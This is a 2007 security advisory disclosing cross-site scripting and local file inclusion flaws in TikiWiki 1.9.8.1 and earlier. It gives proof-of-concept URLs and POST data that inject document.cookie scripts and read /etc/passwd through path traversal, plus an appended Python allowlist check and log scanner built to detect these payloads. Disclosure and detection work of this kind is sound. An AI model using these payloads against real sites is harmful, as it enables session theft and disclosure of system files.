tikiwiki-xsslfi.txt
Posted on 26 October 2007
======================================================================
TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion
======================================================================

Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
        Local File Inclusion
Status: patch available

------------------------------
Affected software description:
------------------------------

Application: TikiWiki
Version:     <= 1.9.8.1
Vendor:      http://tikiwiki.org
Description: TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution.

--------------
Vulnerability:
--------------

XSS:
1. The password reminder page is vulnerable to cross site scripting.
2. Script code can be embedded into wiki-pages.
3. The script db/tiki-db.php is vulnerable to cross site scripting.

LFI:
4. The script db/tiki-db.php is vulnerable to local file inclusion attacks.
5. The script tiki-imexport_languages.php is vulnerable to local file inclusion attacks.

------------
PoC/Exploit:
------------

XSS:
1. enter in the form: <img src="javascript:alert(document.cookie)">
   URL: http://localhost/tikiwiki/tiki-remind_password.php
   POSTDATA: username=%3Cimg+src%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3E
             remind=send+me+my+password

2. create wiki page with: {img src=javascript:alert(document.cookie) }

3. http://localhost/tikiwiki/tiki-index.php?local_php=<script>alert(document.cookie)</script>

LFI:
4. register_globals required:
   http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd
   http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd

5. feature lang_use_db (use database for translation) must be activated:
   URL: http://localhost/tikiwiki/tiki-imexport_languages.php
   POSTDATA: imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import

---------
Solution:
---------

update to 1.9.8.2 or above:
https://sourceforge.net/project/showfiles.php?group_id=64258&package_id=112134&release_id=549549

---------
Timeline:
---------

23.10.2007 - vendor informed
25.10.2007 - vendor released patch
25.10.2007 - public disclosure
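Added defender-side example, not part of the advisory or of TikiWiki's code: an allowlist check for the imp_language value (the mitigation for item 5) and a scan of access-log lines for the register_globals variables from item 4. The lang/<code>/language.php layout, the log format and the sample lines are assumptions constructed for the example.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlparse

# Internal PHP variables named in the advisory; with register_globals on, a query
# string can overwrite them, so they should never legitimately appear in a URL.
INTERNAL_VARS = ("error_handler_file", "local_php")
# A language code is a short lowercase token; '..', '/', and NUL can never match.
LANG_CODE = re.compile(r"^[a-z]{2}(-[a-z]{2})?$")

def safe_language_path(lang_dir, imp_language):
    """Mitigation: map a submitted language code onto lang_dir/<code>/language.php
    (assumed layout). Returns None unless the code passes the allowlist and the
    resolved path stays inside lang_dir (realpath also stops symlink escapes)."""
    if not isinstance(imp_language, str) or not LANG_CODE.match(imp_language):
        return None
    base = os.path.realpath(lang_dir)
    target = os.path.realpath(os.path.join(base, imp_language, "language.php"))
    if os.path.commonpath([base, target]) != base:
        return None
    return target

def suspicious_value(raw):
    """Detection heuristic: decode twice (catches double encoding) and look for
    the traversal, null-byte and script markers used in the advisory's PoCs."""
    v = unquote(unquote(raw))
    return ("\x00" in v or "../" in v or "..\\" in v or v.startswith("/")
            or "<script" in v.lower() or "javascript:" in v.lower())

def flag_request(log_line):
    """Return [(param, decoded_value)] hits for one Apache-style access-log line.
    Any INTERNAL_VARS key in the query string is a hit; imp_language is a hit
    only with a suspicious value. POST bodies are not in access logs, so the
    tiki-imexport_languages.php POST case needs application-level logging."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return []
    query = parse_qs(urlparse(m.group(1)).query, keep_blank_values=True)
    hits = [(n, unquote(v)) for n in INTERNAL_VARS for v in query.get(n, [])]
    hits += [("imp_language", unquote(v)) for v in query.get("imp_language", [])
             if suspicious_value(v)]
    return hits

# Constructed sample log lines (not real traffic), mirroring the advisory's item 4 URLs.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Oct/2007:10:00:00 +0000] "GET /tikiwiki/tiki-index.php?error_handler_file=/etc/passwd HTTP/1.1" 200 512',
    '10.0.0.5 - - [26/Oct/2007:10:00:01 +0000] "GET /tikiwiki/tiki-index.php?page=HomePage HTTP/1.1" 200 8192',
    '10.0.0.5 - - [26/Oct/2007:10:00:02 +0000] "GET /tikiwiki/tiki-index.php?local_php=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(flag_request(line))
```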